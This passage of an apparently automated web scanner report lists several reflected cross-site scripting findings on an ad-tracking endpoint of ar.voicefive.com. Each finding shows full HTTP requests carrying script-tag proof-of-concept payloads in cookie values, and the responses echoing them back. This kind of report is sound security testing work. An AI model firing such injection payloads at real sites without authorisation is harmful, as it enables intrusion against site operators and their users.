Cookie: ar_p91143664=exp=1&initExp=Fri May 20 12:39:51 2011&recExp=Fri May 20 12:39:51 2011&prad=296638381&arc=218676885&; ar_p101866669=exp=1&initExp=Sat May 21 12:32:54 2011&recExp=Sat May 21 12:32:54 2011&prad=323226876&arc=219379757&; ar_p84552060=exp=1&initExp=Sat May 21 12:33:10 2011&recExp=Sat May 21 12:33:10 2011&prad=2108512&arc=4477554&; ar_p97174789=exp=4&initExp=Tue May 17 20:12:51 2011&recExp=Sat May 21 12:34:25 2011&prad=253735209&arc=207615215&; ar_p56282763=exp=1&initExp=Sat May 28 21:31:35 2011&recExp=Sat May 28 21:31:35 2011&prad=62187190&cpn=910903057632460979&arc=41550035&; ar_p101945457=exp=2&initExp=Thu Jun 2 01:11:58 2011&recExp=Thu Jun 2 01:16:20 2011&prad=64669762&arc=42330646&; ar_p81479006=exp=5&initExp=Mon May 23 12:32:43 2011&recExp=Mon Jun 6 10:06:28 2011&prad=64422792&rn=1787539&arc=40380395&; ar_p82806590=exp=6&initExp=Sat May 21 12:32:31 2011&recExp=Mon Jun 6 10:11:46 2011&prad=64304737&arc=40380915&; ar_p20101109=exp=2&initExp=Mon Jun 6 11:54:51 2011&recExp=Mon Jun 13 11:13:21 2011&prad=11794&arc=15313&; ar_p97464717=exp=1&initExp=Mon Jun 13 11:26:24 2011&recExp=Mon Jun 13 11:26:24 2011&prad=1468426&arc=150255&; BMX_BR=pid=p104567837&prad=63567820&arc=42361216&exp=13080105289d9d7<script>alert(1)</script>a917426b808; ar_p104567837=exp=2&initExp=Mon Jun 13 11:34:28 2011&recExp=Tue Jun 14 00:15:28 2011&prad=63567820&arc=42361216&; UID=4a757a7-24.143.206.42-1305663172; BMX_3PC=1

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 14 Jun 2011 00:17:46 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: BMX_G=0; expires=Thu 18-Sep-2008 00:17:46 GMT; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 1557

COMSCORE.BMX.Buddy.run({ "ar_p97464717": 'exp=1&initExp=Mon Jun 13 11:26:24 2011&recExp=Mon Jun 13 11:26:24 2011&prad=1468426&arc=150255&', "ar_p101866669": 'exp=1&initExp=Sat May 21 12:32:54 2011&
...[SNIP]...
X_3PC": '1', "ar_p101945457": 'exp=2&initExp=Thu Jun 2 01:11:58 2011&recExp=Thu Jun 2 01:16:20 2011&prad=64669762&arc=42330646&', "BMX_BR": 'pid=p104567837&prad=63567820&arc=42361216&exp=13080105289d9d7<script>alert(1)</script>a917426b808', "ar_p91143664": 'exp=1&initExp=Fri May 20 12:39:51 2011&recExp=Fri May 20 12:39:51 2011&prad=296638381&arc=218676885&', "ar_p81479006": 'exp=5&initExp=Mon May 23 12:32:43 2011&recExp=Mon Jun 6 10
...[SNIP]...

3.50. http://ar.voicefive.com/b/node_rcAll.pli [UID cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /b/node_rcAll.pli

Issue detail

The value of the UID cookie is copied into the HTML document as plain text between tags. The payload f989f<script>alert(1)</script>c2d7913ec5b was submitted in the UID cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /b/node_rcAll.pli?func=COMSCORE.BMX.Buddy.run&1308010663788 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/mtv.mtvi/survey;sec0=music;sec1=_mn;node=survey;sz=1x2;ord=733653447125107100?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91143664=exp=1&initExp=Fri May 20 12:39:51 2011&recExp=Fri May 20 12:39:51 2011&prad=296638381&arc=218676885&; ar_p101866669=exp=1&initExp=Sat May 21 12:32:54 2011&recExp=Sat May 21 12:32:54 2011&prad=323226876&arc=219379757&; ar_p84552060=exp=1&initExp=Sat May 21 12:33:10 2011&recExp=Sat May 21 12:33:10 2011&prad=2108512&arc=4477554&; ar_p97174789=exp=4&initExp=Tue May 17 20:12:51 2011&recExp=Sat May 21 12:34:25 2011&prad=253735209&arc=207615215&; ar_p56282763=exp=1&initExp=Sat May 28 21:31:35 2011&recExp=Sat May 28 21:31:35 2011&prad=62187190&cpn=910903057632460979&arc=41550035&; ar_p101945457=exp=2&initExp=Thu Jun 2 01:11:58 2011&recExp=Thu Jun 2 01:16:20 2011&prad=64669762&arc=42330646&; ar_p81479006=exp=5&initExp=Mon May 23 12:32:43 2011&recExp=Mon Jun 6 10:06:28 2011&prad=64422792&rn=1787539&arc=40380395&; ar_p82806590=exp=6&initExp=Sat May 21 12:32:31 2011&recExp=Mon Jun 6 10:11:46 2011&prad=64304737&arc=40380915&; ar_p20101109=exp=2&initExp=Mon Jun 6 11:54:51 2011&recExp=Mon Jun 13 11:13:21 2011&prad=11794&arc=15313&; ar_p97464717=exp=1&initExp=Mon Jun 13 11:26:24 2011&recExp=Mon Jun 13 11:26:24 2011&prad=1468426&arc=150255&; BMX_BR=pid=p104567837&prad=63567820&arc=42361216&exp=1308010528; ar_p104567837=exp=2&initExp=Mon Jun 13 11:34:28 2011&recExp=Tue Jun 14 00:15:28 2011&prad=63567820&arc=42361216&; UID=4a757a7-24.143.206.42-1305663172f989f<script>alert(1)</script>c2d7913ec5b; BMX_3PC=1

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 14 Jun 2011 00:17:46 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: BMX_G=0; expires=Thu 18-Sep-2008 00:17:46 GMT; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 1557

COMSCORE.BMX.Buddy.run({ "ar_p97464717": 'exp=1&initExp=Mon Jun 13 11:26:24 2011&recExp=Mon Jun 13 11:26:24 2011&prad=1468426&arc=150255&', "ar_p101866669": 'exp=1&initExp=Sat May 21 12:32:54 2011&
...[SNIP]...
1794&arc=15313&', "ar_p56282763": 'exp=1&initExp=Sat May 28 21:31:35 2011&recExp=Sat May 28 21:31:35 2011&prad=62187190&cpn=910903057632460979&arc=41550035&', "UID": '4a757a7-24.143.206.42-1305663172f989f<script>alert(1)</script>c2d7913ec5b', "BMX_3PC": '1', "ar_p101945457": 'exp=2&initExp=Thu Jun 2 01:11:58 2011&recExp=Thu Jun 2 01:16:20 2011&prad=64669762&arc=42330646&', "BMX_BR": 'pid=p104567837&prad=63567820&arc=42361216&exp=130
...[SNIP]...

3.51. http://ar.voicefive.com/b/node_rcAll.pli [ar_p101866669 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /b/node_rcAll.pli

Issue detail

The value of the ar_p101866669 cookie is copied into the HTML document as plain text between tags. The payload a3957<script>alert(1)</script>d386d8ef993 was submitted in the ar_p101866669 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /b/node_rcAll.pli?func=COMSCORE.BMX.Buddy.run&1308010663788 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/mtv.mtvi/survey;sec0=music;sec1=_mn;node=survey;sz=1x2;ord=733653447125107100?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91143664=exp=1&initExp=Fri May 20 12:39:51 2011&recExp=Fri May 20 12:39:51 2011&prad=296638381&arc=218676885&; ar_p101866669=exp=1&initExp=Sat May 21 12:32:54 2011&recExp=Sat May 21 12:32:54 2011&prad=323226876&arc=219379757&a3957<script>alert(1)</script>d386d8ef993; ar_p84552060=exp=1&initExp=Sat May 21 12:33:10 2011&recExp=Sat May 21 12:33:10 2011&prad=2108512&arc=4477554&; ar_p97174789=exp=4&initExp=Tue May 17 20:12:51 2011&recExp=Sat May 21 12:34:25 2011&prad=253735209&arc=207615215&; ar_p56282763=exp=1&initExp=Sat May 28 21:31:35 2011&recExp=Sat May 28 21:31:35 2011&prad=62187190&cpn=910903057632460979&arc=41550035&; ar_p101945457=exp=2&initExp=Thu Jun 2 01:11:58 2011&recExp=Thu Jun 2 01:16:20 2011&prad=64669762&arc=42330646&; ar_p81479006=exp=5&initExp=Mon May 23 12:32:43 2011&recExp=Mon Jun 6 10:06:28 2011&prad=64422792&rn=1787539&arc=40380395&; ar_p82806590=exp=6&initExp=Sat May 21 12:32:31 2011&recExp=Mon Jun 6 10:11:46 2011&prad=64304737&arc=40380915&; ar_p20101109=exp=2&initExp=Mon Jun 6 11:54:51 2011&recExp=Mon Jun 13 11:13:21 2011&prad=11794&arc=15313&; ar_p97464717=exp=1&initExp=Mon Jun 13 11:26:24 2011&recExp=Mon Jun 13 11:26:24 2011&prad=1468426&arc=150255&; BMX_BR=pid=p104567837&prad=63567820&arc=42361216&exp=1308010528; ar_p104567837=exp=2&initExp=Mon Jun 13 11:34:28 2011&recExp=Tue Jun 14 00:15:28 2011&prad=63567820&arc=42361216&; UID=4a757a7-24.143.206.42-1305663172; BMX_3PC=1

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 14 Jun 2011 00:17:45 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: BMX_G=0; expires=Thu 18-Sep-2008 00:17:45 GMT; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 1557

COMSCORE.BMX.Buddy.run({ "UID": '4a757a7-24.143.206.42-1305663172', "ar_p97464717": 'exp=1&initExp=Mon Jun 13 11:26:24 2011&recExp=Mon Jun 13 11:26:24 2011&prad=1468426&arc=150255&', "ar_p101866669": 'exp=1&initExp=Sat May 21 12:32:54 2011&recExp=Sat May 21 12:32:54 2011&prad=323226876&arc=219379757&a3957<script>alert(1)</script>d386d8ef993', "ar_p104567837": 'exp=2&initExp=Mon Jun 13 11:34:28 2011&recExp=Tue Jun 14 00:15:28 2011&prad=63567820&arc=42361216&', "ar_p97174789": 'exp=4&initExp=Tue May 17 20:12:51 2011&recExp=Sat May 21 12:
...[SNIP]...

3.52. http://ar.voicefive.com/b/node_rcAll.pli [ar_p101945457 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /b/node_rcAll.pli

Issue detail

The value of the ar_p101945457 cookie is copied into the HTML document as plain text between tags. The payload 60d46<script>alert(1)</script>aec37149a73 was submitted in the ar_p101945457 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /b/node_rcAll.pli?func=COMSCORE.BMX.Buddy.run&1308010663788 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/mtv.mtvi/survey;sec0=music;sec1=_mn;node=survey;sz=1x2;ord=733653447125107100?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91143664=exp=1&initExp=Fri May 20 12:39:51 2011&recExp=Fri May 20 12:39:51 2011&prad=296638381&arc=218676885&; ar_p101866669=exp=1&initExp=Sat May 21 12:32:54 2011&recExp=Sat May 21 12:32:54 2011&prad=323226876&arc=219379757&; ar_p84552060=exp=1&initExp=Sat May 21 12:33:10 2011&recExp=Sat May 21 12:33:10 2011&prad=2108512&arc=4477554&; ar_p97174789=exp=4&initExp=Tue May 17 20:12:51 2011&recExp=Sat May 21 12:34:25 2011&prad=253735209&arc=207615215&; ar_p56282763=exp=1&initExp=Sat May 28 21:31:35 2011&recExp=Sat May 28 21:31:35 2011&prad=62187190&cpn=910903057632460979&arc=41550035&; ar_p101945457=exp=2&initExp=Thu Jun 2 01:11:58 2011&recExp=Thu Jun 2 01:16:20 2011&prad=64669762&arc=42330646&60d46<script>alert(1)</script>aec37149a73; ar_p81479006=exp=5&initExp=Mon May 23 12:32:43 2011&recExp=Mon Jun 6 10:06:28 2011&prad=64422792&rn=1787539&arc=40380395&; ar_p82806590=exp=6&initExp=Sat May 21 12:32:31 2011&recExp=Mon Jun 6 10:11:46 2011&prad=64304737&arc=40380915&; ar_p20101109=exp=2&initExp=Mon Jun 6 11:54:51 2011&recExp=Mon Jun 13 11:13:21 2011&prad=11794&arc=15313&; ar_p97464717=exp=1&initExp=Mon Jun 13 11:26:24 2011&recExp=Mon Jun 13 11:26:24 2011&prad=1468426&arc=150255&; BMX_BR=pid=p104567837&prad=63567820&arc=42361216&exp=1308010528; ar_p104567837=exp=2&initExp=Mon Jun 13 11:34:28 2011&recExp=Tue Jun 14 00:15:28 2011&prad=63567820&arc=42361216&; UID=4a757a7-24.143.206.42-1305663172; BMX_3PC=1

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 14 Jun 2011 00:17:45 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: BMX_G=0; expires=Thu 18-Sep-2008 00:17:45 GMT; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 1557

COMSCORE.BMX.Buddy.run({ "ar_p97464717": 'exp=1&initExp=Mon Jun 13 11:26:24 2011&recExp=Mon Jun 13 11:26:24 2011&prad=1468426&arc=150255&', "ar_p101866669": 'exp=1&initExp=Sat May 21 12:32:54 2011&
...[SNIP]...
460979&arc=41550035&', "UID": '4a757a7-24.143.206.42-1305663172', "BMX_3PC": '1', "ar_p101945457": 'exp=2&initExp=Thu Jun 2 01:11:58 2011&recExp=Thu Jun 2 01:16:20 2011&prad=64669762&arc=42330646&60d46<script>alert(1)</script>aec37149a73', "BMX_BR": 'pid=p104567837&prad=63567820&arc=42361216&exp=1308010528', "ar_p91143664": 'exp=1&initExp=Fri May 20 12:39:51 2011&recExp=Fri May 20 12:39:51 2011&prad=296638381&arc=218676885&', "ar_p
...[SNIP]...

3.53. http://ar.voicefive.com/b/node_rcAll.pli [ar_p104567837 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /b/node_rcAll.pli

Issue detail

The value of the ar_p104567837 cookie is copied into the HTML document as plain text between tags. The payload 88eb1<script>alert(1)</script>6e1f2d203c5 was submitted in the ar_p104567837 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /b/node_rcAll.pli?func=COMSCORE.BMX.Buddy.run&1308010663788 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/mtv.mtvi/survey;sec0=music;sec1=_mn;node=survey;sz=1x2;ord=733653447125107100?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91143664=exp=1&initExp=Fri May 20 12:39:51 2011&recExp=Fri May 20 12:39:51 2011&prad=296638381&arc=218676885&; ar_p101866669=exp=1&initExp=Sat May 21 12:32:54 2011&recExp=Sat May 21 12:32:54 2011&prad=323226876&arc=219379757&; ar_p84552060=exp=1&initExp=Sat May 21 12:33:10 2011&recExp=Sat May 21 12:33:10 2011&prad=2108512&arc=4477554&; ar_p97174789=exp=4&initExp=Tue May 17 20:12:51 2011&recExp=Sat May 21 12:34:25 2011&prad=253735209&arc=207615215&; ar_p56282763=exp=1&initExp=Sat May 28 21:31:35 2011&recExp=Sat May 28 21:31:35 2011&prad=62187190&cpn=910903057632460979&arc=41550035&; ar_p101945457=exp=2&initExp=Thu Jun 2 01:11:58 2011&recExp=Thu Jun 2 01:16:20 2011&prad=64669762&arc=42330646&; ar_p81479006=exp=5&initExp=Mon May 23 12:32:43 2011&recExp=Mon Jun 6 10:06:28 2011&prad=64422792&rn=1787539&arc=40380395&; ar_p82806590=exp=6&initExp=Sat May 21 12:32:31 2011&recExp=Mon Jun 6 10:11:46 2011&prad=64304737&arc=40380915&; ar_p20101109=exp=2&initExp=Mon Jun 6 11:54:51 2011&recExp=Mon Jun 13 11:13:21 2011&prad=11794&arc=15313&; ar_p97464717=exp=1&initExp=Mon Jun 13 11:26:24 2011&recExp=Mon Jun 13 11:26:24 2011&prad=1468426&arc=150255&; BMX_BR=pid=p104567837&prad=63567820&arc=42361216&exp=1308010528; ar_p104567837=exp=2&initExp=Mon Jun 13 11:34:28 2011&recExp=Tue Jun 14 00:15:28 2011&prad=63567820&arc=42361216&88eb1<script>alert(1)</script>6e1f2d203c5; UID=4a757a7-24.143.206.42-1305663172; BMX_3PC=1

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 14 Jun 2011 00:17:46 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: BMX_G=0; expires=Thu 18-Sep-2008 00:17:46 GMT; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 1557

COMSCORE.BMX.Buddy.run({ "ar_p97464717": 'exp=1&initExp=Mon Jun 13 11:26:24 2011&recExp=Mon Jun 13 11:26:24 2011&prad=1468426&arc=150255&', "ar_p101866669": 'exp=1&initExp=Sat May 21 12:32:54 2011&recExp=Sat May 21 12:32:54 2011&prad=323226876&arc=219379757&', "ar_p104567837": 'exp=2&initExp=Mon Jun 13 11:34:28 2011&recExp=Tue Jun 14 00:15:28 2011&prad=63567820&arc=42361216&88eb1<script>alert(1)</script>6e1f2d203c5', "ar_p97174789": 'exp=4&initExp=Tue May 17 20:12:51 2011&recExp=Sat May 21 12:34:25 2011&prad=253735209&arc=207615215&', "ar_p82806590": 'exp=6&initExp=Sat May 21 12:32:31 2011&recExp=Mon Jun 6 10
...[SNIP]...

3.54. http://ar.voicefive.com/b/node_rcAll.pli [ar_p20101109 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /b/node_rcAll.pli

Issue detail

The value of the ar_p20101109 cookie is copied into the HTML document as plain text between tags. The payload ae91f<script>alert(1)</script>9d1c4ccadb1 was submitted in the ar_p20101109 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /b/node_rcAll.pli?func=COMSCORE.BMX.Buddy.run&1308010663788 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/mtv.mtvi/survey;sec0=music;sec1=_mn;node=survey;sz=1x2;ord=733653447125107100?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91143664=exp=1&initExp=Fri May 20 12:39:51 2011&recExp=Fri May 20 12:39:51 2011&prad=296638381&arc=218676885&; ar_p101866669=exp=1&initExp=Sat May 21 12:32:54 2011&recExp=Sat May 21 12:32:54 2011&prad=323226876&arc=219379757&; ar_p84552060=exp=1&initExp=Sat May 21 12:33:10 2011&recExp=Sat May 21 12:33:10 2011&prad=2108512&arc=4477554&; ar_p97174789=exp=4&initExp=Tue May 17 20:12:51 2011&recExp=Sat May 21 12:34:25 2011&prad=253735209&arc=207615215&; ar_p56282763=exp=1&initExp=Sat May 28 21:31:35 2011&recExp=Sat May 28 21:31:35 2011&prad=62187190&cpn=910903057632460979&arc=41550035&; ar_p101945457=exp=2&initExp=Thu Jun 2 01:11:58 2011&recExp=Thu Jun 2 01:16:20 2011&prad=64669762&arc=42330646&; ar_p81479006=exp=5&initExp=Mon May 23 12:32:43 2011&recExp=Mon Jun 6 10:06:28 2011&prad=64422792&rn=1787539&arc=40380395&; ar_p82806590=exp=6&initExp=Sat May 21 12:32:31 2011&recExp=Mon Jun 6 10:11:46 2011&prad=64304737&arc=40380915&; ar_p20101109=exp=2&initExp=Mon Jun 6 11:54:51 2011&recExp=Mon Jun 13 11:13:21 2011&prad=11794&arc=15313&ae91f<script>alert(1)</script>9d1c4ccadb1; ar_p97464717=exp=1&initExp=Mon Jun 13 11:26:24 2011&recExp=Mon Jun 13 11:26:24 2011&prad=1468426&arc=150255&; BMX_BR=pid=p104567837&prad=63567820&arc=42361216&exp=1308010528; ar_p104567837=exp=2&initExp=Mon Jun 13 11:34:28 2011&recExp=Tue Jun 14 00:15:28 2011&prad=63567820&arc=42361216&; UID=4a757a7-24.143.206.42-1305663172; BMX_3PC=1

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 14 Jun 2011 00:17:46 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: BMX_G=0; expires=Thu 18-Sep-2008 00:17:46 GMT; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 1557

COMSCORE.BMX.Buddy.run({ "ar_p97464717": 'exp=1&initExp=Mon Jun 13 11:26:24 2011&recExp=Mon Jun 13 11:26:24 2011&prad=1468426&arc=150255&', "ar_p101866669": 'exp=1&initExp=Sat May 21 12:32:54 2011&
...[SNIP]...
itExp=Sat May 21 12:33:10 2011&recExp=Sat May 21 12:33:10 2011&prad=2108512&arc=4477554&', "ar_p20101109": 'exp=2&initExp=Mon Jun 6 11:54:51 2011&recExp=Mon Jun 13 11:13:21 2011&prad=11794&arc=15313&ae91f<script>alert(1)</script>9d1c4ccadb1', "ar_p56282763": 'exp=1&initExp=Sat May 28 21:31:35 2011&recExp=Sat May 28 21:31:35 2011&prad=62187190&cpn=910903057632460979&arc=41550035&', "UID": '4a757a7-24.143.206.42-1305663172', "BMX_3PC":
...[SNIP]...

3.55. http://ar.voicefive.com/b/node_rcAll.pli [ar_p56282763 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /b/node_rcAll.pli

Issue detail

The value of the ar_p56282763 cookie is copied into the HTML document as plain text between tags. The payload 49e92<script>alert(1)</script>e9b3d058372 was submitted in the ar_p56282763 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /b/node_rcAll.pli?func=COMSCORE.BMX.Buddy.run&1308010663788 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/mtv.mtvi/survey;sec0=music;sec1=_mn;node=survey;sz=1x2;ord=733653447125107100?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91143664=exp=1&initExp=Fri May 20 12:39:51 2011&recExp=Fri May 20 12:39:51 2011&prad=296638381&arc=218676885&; ar_p101866669=exp=1&initExp=Sat May 21 12:32:54 2011&recExp=Sat May 21 12:32:54 2011&prad=323226876&arc=219379757&; ar_p84552060=exp=1&initExp=Sat May 21 12:33:10 2011&recExp=Sat May 21 12:33:10 2011&prad=2108512&arc=4477554&; ar_p97174789=exp=4&initExp=Tue May 17 20:12:51 2011&recExp=Sat May 21 12:34:25 2011&prad=253735209&arc=207615215&; ar_p56282763=exp=1&initExp=Sat May 28 21:31:35 2011&recExp=Sat May 28 21:31:35 2011&prad=62187190&cpn=910903057632460979&arc=41550035&49e92<script>alert(1)</script>e9b3d058372; ar_p101945457=exp=2&initExp=Thu Jun 2 01:11:58 2011&recExp=Thu Jun 2 01:16:20 2011&prad=64669762&arc=42330646&; ar_p81479006=exp=5&initExp=Mon May 23 12:32:43 2011&recExp=Mon Jun 6 10:06:28 2011&prad=64422792&rn=1787539&arc=40380395&; ar_p82806590=exp=6&initExp=Sat May 21 12:32:31 2011&recExp=Mon Jun 6 10:11:46 2011&prad=64304737&arc=40380915&; ar_p20101109=exp=2&initExp=Mon Jun 6 11:54:51 2011&recExp=Mon Jun 13 11:13:21 2011&prad=11794&arc=15313&; ar_p97464717=exp=1&initExp=Mon Jun 13 11:26:24 2011&recExp=Mon Jun 13 11:26:24 2011&prad=1468426&arc=150255&; BMX_BR=pid=p104567837&prad=63567820&arc=42361216&exp=1308010528; ar_p104567837=exp=2&initExp=Mon Jun 13 11:34:28 2011&recExp=Tue Jun 14 00:15:28 2011&prad=63567820&arc=42361216&; UID=4a757a7-24.143.206.42-1305663172; BMX_3PC=1

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 14 Jun 2011 00:17:45 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: BMX_G=0; expires=Thu 18-Sep-2008 00:17:45 GMT; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 1557

COMSCORE.BMX.Buddy.run({ "ar_p97464717": 'exp=1&initExp=Mon Jun 13 11:26:24 2011&recExp=Mon Jun 13 11:26:24 2011&prad=1468426&arc=150255&', "ar_p101866669": 'exp=1&initExp=Sat May 21 12:32:54 2011&
...[SNIP]...
2011&recExp=Mon Jun 13 11:13:21 2011&prad=11794&arc=15313&', "ar_p56282763": 'exp=1&initExp=Sat May 28 21:31:35 2011&recExp=Sat May 28 21:31:35 2011&prad=62187190&cpn=910903057632460979&arc=41550035&49e92<script>alert(1)</script>e9b3d058372', "UID": '4a757a7-24.143.206.42-1305663172', "BMX_3PC": '1', "ar_p101945457": 'exp=2&initExp=Thu Jun 2 01:11:58 2011&recExp=Thu Jun 2 01:16:20 2011&prad=64669762&arc=42330646&', "BMX_BR": 'pid=p
...[SNIP]...

3.56. http://ar.voicefive.com/b/node_rcAll.pli [ar_p81479006 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /b/node_rcAll.pli

Issue detail

The value of the ar_p81479006 cookie is copied into the HTML document as plain text between tags. The payload 96c60<script>alert(1)</script>4bda17080c7 was submitted in the ar_p81479006 cookie. This input was echoed unmodified in the application's response.

